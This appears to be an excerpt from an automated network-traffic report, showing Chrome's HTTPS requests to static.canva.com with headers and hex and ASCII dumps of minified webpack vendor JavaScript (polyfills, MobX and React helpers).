                                                                                                                                                                                                                                                                    Data Ascii: X-Content-Type-Options: nosniffSet-Cookie: __cf_bm=FYDqnYht6KkCS6n.9mmodat1Hxryo3Fio3eHu0QhK6U-1732114890-1.0.1.1-Qtl7uh0laXfnr.AFP5OtOA4hGsufyHI4yhtbPdgfEQvObq7b2Lu60Iko34vlolJq30TMli6XeS8QHq9c24cZWA; path=/; expires=Wed, 20-Nov-24 15:31:30 GMT; domain
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC570INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 61 64 39 32 33 31 65 64 36 37 30 36 66 61 64 66 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 34 33 36 5d 2c 7b 39 30 37 35 35 34 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 6e 2e 67 2c 72 3d 7b 7d 3b 66 6f 72 28 76 61 72 20 69 20 69 6e 20 66 75 6e 63 74 69 6f
                                                                                                                                                                                                                                                                    Data Ascii: /*! For license information please see ad9231ed6706fadf.vendor.js.LICENSE.txt */(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[5436],{907554:(e,t,n)=>{!function(){var e="undefined"!=typeof window?window:n.g,r={};for(var i in functio
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 6c 54 68 69 73 2c 6e 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 74 5d 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 72 29 7b 76 61 72 20 69 3d 6e 5b 72 5d 3b 69 66 28 69 26 26 69 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 69 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 66 69 6e 64 20 67 6c 6f 62 61 6c 20 6f 62 6a 65 63 74 22 29 7d 28 74 68 69 73 29 3b 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 29 7b 69 66 28 74 29 65 3a 7b 76 61 72 20 6e 3d 73 3b 65 3d 65 2e 73 70 6c 69 74 28 22 2e 22 29 3b 66 6f 72 28 76 61 72 20 72 3d 30 3b
                                                                                                                                                                                                                                                                    Data Ascii: lThis,n,"object"==typeof e&&e,"object"==typeof self&&self,"object"==typeof t&&t];for(var r=0;r<n.length;++r){var i=n[r];if(i&&i.Math==Math)return i}throw Error("Cannot find global object")}(this);function u(e,t){if(t)e:{var n=s;e=e.split(".");for(var r=0;
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 6f 74 6f 74 79 70 65 2c 65 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 28 61 28 74 68 69 73 29 29 7d 7d 29 7d 72 65 74 75 72 6e 20 65 7d 29 29 3b 76 61 72 20 66 2c 64 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3f 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 7d 72 65 74 75 72 6e 20 74 2e 70 72 6f 74 6f 74 79 70 65 3d 65 2c 6e 65 77 20 74 7d 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 29 66 3d 4f 62 6a 65 63 74 2e 73 65 74 50
                                                                                                                                                                                                                                                                    Data Ascii: ototype,e,{configurable:!0,writable:!0,value:function(){return c(a(this))}})}return e}));var f,d="function"==typeof Object.create?Object.create:function(e){function t(){}return t.prototype=e,new t};if("function"==typeof Object.setPrototypeOf)f=Object.setP
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 73 74 61 6e 63 65 6f 66 20 4f 62 6a 65 63 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 49 74 65 72 61 74 6f 72 20 72 65 73 75 6c 74 20 22 2b 69 2b 22 20 69 73 20 6e 6f 74 20 61 6e 20 6f 62 6a 65 63 74 22 29 3b 69 66 28 21 69 2e 64 6f 6e 65 29 72 65 74 75 72 6e 20 65 2e 67 2e 6f 3d 21 31 2c 69 3b 76 61 72 20 61 3d 69 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 6f 29 7b 72 65 74 75 72 6e 20 65 2e 67 2e 6c 3d 6e 75 6c 6c 2c 77 28 65 2e 67 2c 6f 29 2c 4d 28 65 29 7d 72 65 74 75 72 6e 20 65 2e 67 2e 6c 3d 6e 75 6c 6c 2c 72 2e 63 61 6c 6c 28 65 2e 67 2c 61 29 2c 4d 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 65 29 7b 66 6f 72 28 3b 65 2e 67 2e 67 3b 29 74 72 79 7b 76 61 72 20 74 3d 65 2e 68 28 65 2e 67 29 3b 69 66 28 74 29 72 65 74 75 72
                                                                                                                                                                                                                                                                    Data Ascii: stanceof Object))throw new TypeError("Iterator result "+i+" is not an object");if(!i.done)return e.g.o=!1,i;var a=i.value}catch(o){return e.g.l=null,w(e.g,o),M(e)}return e.g.l=null,r.call(e.g,a),M(e)}function M(e){for(;e.g.g;)try{var t=e.h(e.g);if(t)retur
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 2c 65 29 29 72 65 74 75 72 6e 7b 72 65 3a 69 2c 76 3a 61 7d 7d 72 65 74 75 72 6e 7b 72 65 3a 2d 31 2c 76 3a 76 6f 69 64 20 30 7d 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 2c 74 2c 6e 29 7b 69 66 28 6e 75 6c 6c 3d 3d 65 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 6e 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 6e 2b 22 20
                                                                                                                                                                                                                                                                    Data Ascii: ,e))return{re:i,v:a}}return{re:-1,v:void 0}}function O(e,t,n){if(null==e)throw new TypeError("The 'this' value for String.prototype."+n+" must not be null or undefined");if(t instanceof RegExp)throw new TypeError("First argument to String.prototype."+n+"
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 6c 28 74 2c 72 29 29 7d 7d 76 61 72 20 74 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 65 28 74 68 69 73 2e 44 29 2c 72 65 6a 65 63 74 3a 65 28 74 68 69 73 2e 6c 29 7d 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 3d 3d 3d 74 68 69 73 29 74 68 69 73 2e 6c 28 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 41 20 50 72 6f 6d 69 73 65 20 63 61 6e 6e 6f 74 20 72 65 73 6f 6c 76 65 20 74 6f 20 69 74 73 65 6c 66 22 29 29 3b 65 6c 73 65 20 69 66 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 74 68 69 73 2e 49 28 65 29 3b 65 6c 73 65 7b 65 3a 73 77 69 74 63 68 28 74 79 70 65 6f 66 20 65 29 7b 63 61 73 65 22 6f 62 6a 65 63 74 22 3a 76 61 72 20 6e 3d 6e 75 6c 6c 21 3d 65 3b 62 72 65 61
                                                                                                                                                                                                                                                                    Data Ascii: l(t,r))}}var t=this,n=!1;return{resolve:e(this.D),reject:e(this.l)}},t.prototype.D=function(e){if(e===this)this.l(new TypeError("A Promise cannot resolve to itself"));else if(e instanceof t)this.I(e);else{e:switch(typeof e){case"object":var n=null!=e;brea
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 29 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 4b 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 6a 28 29 3b 74 72 79 7b 65 2e 63 61 6c 6c 28 74 2c 6e 2e 72 65 73 6f 6c 76 65 2c 6e 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 72 29 7b 6e 2e 72 65 6a 65 63 74 28 72 29 7d 7d 2c 74 2e 70 72 6f 74 6f 74 79 70 65 2e 74 68 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 3f 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 72 79 7b 69 28 65 28 74 29 29 7d 63 61 74 63 68 28 6e 29 7b 61 28 6e 29 7d 7d 3a 74 7d 76 61 72 20 69 2c 61 2c 6f 3d 6e 65 77 20 74 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 3d 65 2c 61 3d
                                                                                                                                                                                                                                                                    Data Ascii: )},t.prototype.K=function(e,t){var n=this.j();try{e.call(t,n.resolve,n.reject)}catch(r){n.reject(r)}},t.prototype.then=function(e,n){function r(e,t){return"function"==typeof e?function(t){try{i(e(t))}catch(n){a(n)}}:t}var i,a,o=new t((function(e,t){i=e,a=
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 26 26 69 28 65 29 2c 74 28 65 29 29 7d 29 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 65 7c 7c 21 4f 62 6a 65 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 6e 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 7d 29 2c 72 3d 6e 65 77 20 65 28 5b 5b 74 2c 32 5d 2c 5b 6e 2c 33 5d 5d 29 3b 72 65 74 75 72 6e 20 32 3d 3d 72 2e 67 65 74 28 74 29 26 26 33 3d 3d 72 2e 67 65 74 28 6e 29 26 26 28 72 2e 64 65 6c 65 74 65 28 74 29 2c 72 2e 73 65 74 28 6e 2c 34 29 2c 21 72 2e 68 61 73 28 74 29 26 26 34 3d 3d 72 2e 67 65 74 28 6e 29 29 7d 63 61 74 63 68 28 69 29 7b 72 65 74 75 72 6e 21 31 7d 7d 28 29 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 73 3d 22 24 6a 73 63 6f 6d 70 5f 68 69 64
                                                                                                                                                                                                                                                                    Data Ascii: &&i(e),t(e))})}if(function(){if(!e||!Object.seal)return!1;try{var t=Object.seal({}),n=Object.seal({}),r=new e([[t,2],[n,3]]);return 2==r.get(t)&&3==r.get(n)&&(r.delete(t),r.set(n,4),!r.has(t)&&4==r.get(n))}catch(i){return!1}}())return e;var s="$jscomp_hid
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 31 5d 29 7d 7d 69 66 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 21 65 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 65 7c 7c 21 65 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 74 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 6e 3d 6e 65 77 20 65 28 6c 28 5b 5b 74 2c 22 73 22 5d 5d 29 29 3b 69 66 28 22 73 22 21 3d 6e 2e 67 65 74 28 74 29 7c 7c 31 21 3d 6e 2e 73 69 7a 65 7c 7c 6e 2e 67 65 74 28 7b 78 3a 34 7d 29 7c 7c 6e 2e 73 65 74 28 7b 78 3a 34 7d 2c 22 74 22 29 21 3d 6e 7c 7c 32 21 3d 6e 2e 73 69 7a 65 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 72 3d 6e 2e 65 6e 74
                                                                                                                                                                                                                                                                    Data Ascii: 1])}}if(function(){if(!e||"function"!=typeof e||!e.prototype.entries||"function"!=typeof Object.seal)return!1;try{var t=Object.seal({x:4}),n=new e(l([[t,"s"]]));if("s"!=n.get(t)||1!=n.size||n.get({x:4})||n.set({x:4},"t")!=n||2!=n.size)return!1;var r=n.ent


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    10192.168.2.1249727104.16.103.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:29 UTC570OUTGET /web/4af0e43f4ef393f1.vendor.js HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1359INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:30 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 205770
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5950ce6aad8c9b-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    Age: 1130954
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "af2fe7bb481acfbd2a36bc7510332bf4"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:16 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 30 Oct 2024 03:11:25 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 31 Oct 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: v66HTwgisIbzMk+fxsoN1mPCDRFaoot2DhDx8aeDvt+OfYWfJRqmYgD3knIrDEPyErzUmjEcHfQ=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: THP3JF995A543PS8
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: _6GpQl_RNLS0kzAGnSBp3UGxkc4XuZcH
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC777INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 6f 48 50 57 50 64 4a 39 6d 6c 74 77 45 7a 4c 75 54 47 4e 6d 2e 4e 46 4e 37 4e 6b 42 6b 77 51 72 6f 35 62 50 57 38 74 48 68 47 6f 2d 31 37 33 32 31 31 34 38 39 30 2d 31 2e 30 2e 31 2e 31 2d 4d 34 52 4d 45 48 48 79 35 71 33 79 45 50 61 36 48 66 42 55 49 6a 33 6a 4f 5f 65 53 39 73 31 34 6a 71 47 5a 47 62 32 7a 69 6b 52 69 34 63 75 70 6e 73 37 51 65 62 58 53 69 67 48 7a 73 34 30 51 6b 52 77 67 55 36 76 55 43 4b 68 79 6d 6d 48 55 53 5a 4c 4b 55 77 3b 20 70 61 74 68 3d 2f 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 32 30 2d 4e 6f 76 2d 32 34 20 31 35 3a 33 31 3a 33 30 20 47 4d 54 3b 20 64 6f 6d 61 69 6e 3d 2e 63 61 6e 76 61 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61
                                                                                                                                                                                                                                                                    Data Ascii: Set-Cookie: __cf_bm=oHPWPdJ9mltwEzLuTGNm.NFN7NkBkwQro5bPW8tHhGo-1732114890-1.0.1.1-M4RMEHHy5q3yEPa6HfBUIj3jO_eS9s14jqGZGb2zikRi4cupns7QebXSigHzs40QkRwgU6vUCKhymmHUSZLKUw; path=/; expires=Wed, 20-Nov-24 15:31:30 GMT; domain=.canva.com; HttpOnly; Secure; Sa
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC602INData Raw: 2f 2a 21 20 46 6f 72 20 6c 69 63 65 6e 73 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 73 65 65 20 34 61 66 30 65 34 33 66 34 65 66 33 39 33 66 31 2e 76 65 6e 64 6f 72 2e 6a 73 2e 4c 49 43 45 4e 53 45 2e 74 78 74 20 2a 2f 0a 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 32 36 35 33 5d 2c 7b 34 30 37 34 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 51 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 72 3d 6e 28 33 36 36 39 39 35 29 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 68 69 6c 64 72 65 6e 2c 6e 3d 65 2e 72
                                                                                                                                                                                                                                                                    Data Ascii: /*! For license information please see 4af0e43f4ef393f1.vendor.js.LICENSE.txt */"use strict";(self.webpackChunk_canva_web=self.webpackChunk_canva_web||[]).push([[2653],{40749:(e,t,n)=>{n.d(t,{Q:()=>a});var r=n(366995);function a(e){var t=e.children,n=e.r
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 2c 33 36 34 36 32 30 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 50 3a 28 29 3d 3e 64 7d 29 3b 76 61 72 20 72 2c 61 2c 69 3d 6e 28 38 37 35 36 30 34 29 2c 6f 3d 6e 28 37 37 35 33 32 38 29 2c 6c 3d 6e 28 33 36 36 39 39 35 29 2c 75 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 66 6f 72 2c 73 3d 6e 75 6c 6c 21 3d 3d 28 61 3d 6e 75 6c 6c 3d 3d 3d 28 72 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 22 6e 61 6d 65 22 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 72 3f 76 6f 69 64 20 30 3a 72 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 61 26 26 61 2c 63 3d 75 3f 53 79 6d 62
                                                                                                                                                                                                                                                                    Data Ascii: ,364620:(e,t,n)=>{n.d(t,{P:()=>d});var r,a,i=n(875604),o=n(775328),l=n(366995),u="function"==typeof Symbol&&Symbol.for,s=null!==(a=null===(r=Object.getOwnPropertyDescriptor((function(){}),"name"))||void 0===r?void 0:r.configurable)&&void 0!==a&&a,c=u?Symb
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 72 20 70 3d 7b 24 24 74 79 70 65 6f 66 3a 21 30 2c 72 65 6e 64 65 72 3a 21 30 2c 63 6f 6d 70 61 72 65 3a 21 30 2c 74 79 70 65 3a 21 30 2c 64 69 73 70 6c 61 79 4e 61 6d 65 3a 21 30 7d 7d 2c 37 37 35 33 32 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 44 3a 28 29 3d 3e 61 2c 46 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 72 3d 65 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 72 65 74 75 72 6e 20 72 7d 7d 2c 32 34 37 36 35 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 41 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 72 3d 6e 28 34 32 37 38 32 29 2c 61 3d 6e 28 38 37 35 36 30 34 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 76 61 72 20 74 3d 28 30 2c 61 2e 75 73 65 53 74 61 74 65 29 28 28 66 75 6e
                                                                                                                                                                                                                                                                    Data Ascii: r p={$$typeof:!0,render:!0,compare:!0,type:!0,displayName:!0}},775328:(e,t,n)=>{n.d(t,{D:()=>a,F:()=>i});var r=!1;function a(e){r=e}function i(){return r}},24765:(e,t,n)=>{n.d(t,{A:()=>i});var r=n(42782),a=n(875604);function i(e){var t=(0,a.useState)((fun
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 61 6c 53 74 6f 72 65 29 28 64 2e 73 75 62 73 63 72 69 62 65 2c 64 2e 67 65 74 53 6e 61 70 73 68 6f 74 2c 64 2e 67 65 74 53 6e 61 70 73 68 6f 74 29 2c 64 2e 72 65 61 63 74 69 6f 6e 2e 74 72 61 63 6b 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 63 3d 65 28 29 7d 63 61 74 63 68 28 74 29 7b 66 3d 74 7d 7d 29 29 2c 66 29 74 68 72 6f 77 20 66 3b 72 65 74 75 72 6e 20 63 7d 7d 2c 38 38 30 32 30 37 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 53 42 3a 28 29 3d 3e 61 7d 29 3b 76 61 72 20 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 76 61 72 20 74 3d 74 68 69 73 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 68 69 73 2c 22 66 69 6e 61 6c 69 7a 65 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21
                                                                                                                                                                                                                                                                    Data Ascii: alStore)(d.subscribe,d.getSnapshot,d.getSnapshot),d.reaction.track((function(){try{c=e()}catch(t){f=t}})),f)throw f;return c}},880207:(e,t,n)=>{n.d(t,{SB:()=>a});var r=function(){function e(e){var t=this;Object.defineProperty(this,"finalize",{enumerable:!
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f 69 64 20 30 3d 3d 3d 74 68 69 73 2e 73 77 65 65 70 54 69 6d 65 6f 75 74 26 26 28 74 68 69 73 2e 73 77 65 65 70 54 69 6d 65 6f 75 74 3d 73 65 74 54 69 6d 65 6f 75 74 28 74 68 69 73 2e 73 77 65 65 70 2c 31 65 34 29 29 7d 7d 29 2c 65 7d 28 29 2c 61 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 46 69 6e 61 6c 69 7a 61 74 69 6f 6e 52 65 67 69 73 74 72 79 3f 46 69 6e 61 6c 69 7a 61 74 69 6f 6e 52 65 67 69 73 74 72 79 3a 72 7d 2c 34 35 34 36 34 38 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 76 61 72 20 72 3d 6e 28 34 32 37 38 32 29 3b 69 66 28 21 6e 28 38 37 35 36 30 34 29 2e 75 73 65 53 74 61 74 65 29 74 68 72 6f 77
                                                                                                                                                                                                                                                                    Data Ascii: configurable:!0,writable:!0,value:function(){void 0===this.sweepTimeout&&(this.sweepTimeout=setTimeout(this.sweep,1e4))}}),e}(),a="undefined"!=typeof FinalizationRegistry?FinalizationRegistry:r},454648:(e,t,n)=>{var r=n(42782);if(!n(875604).useState)throw
                                                                                                                                                                                                                                                                    2024-11-20 15:01:30 UTC1369INData Raw: 66 20 65 3f 22 5b 4d 6f 62 58 5d 20 6d 69 6e 69 66 69 65 64 20 65 72 72 6f 72 20 6e 72 3a 20 22 2b 65 2b 28 6e 2e 6c 65 6e 67 74 68 3f 22 20 22 2b 6e 2e 6d 61 70 28 53 74 72 69 6e 67 29 2e 6a 6f 69 6e 28 22 2c 22 29 3a 22 22 29 2b 22 2e 20 46 69 6e 64 20 74 68 65 20 66 75 6c 6c 20 65 72 72 6f 72 20 61 74 3a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 6f 62 78 6a 73 2f 6d 6f 62 78 2f 62 6c 6f 62 2f 6d 61 69 6e 2f 70 61 63 6b 61 67 65 73 2f 6d 6f 62 78 2f 73 72 63 2f 65 72 72 6f 72 73 2e 74 73 22 3a 22 5b 4d 6f 62 58 5d 20 22 2b 65 29 7d 76 61 72 20 61 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69
                                                                                                                                                                                                                                                                    Data Ascii: f e?"[MobX] minified error nr: "+e+(n.length?" "+n.map(String).join(","):"")+". Find the full error at: https://github.com/mobxjs/mobx/blob/main/packages/mobx/src/errors.ts":"[MobX] "+e)}var a={};function i(){return"undefined"!=typeof globalThis?globalThi
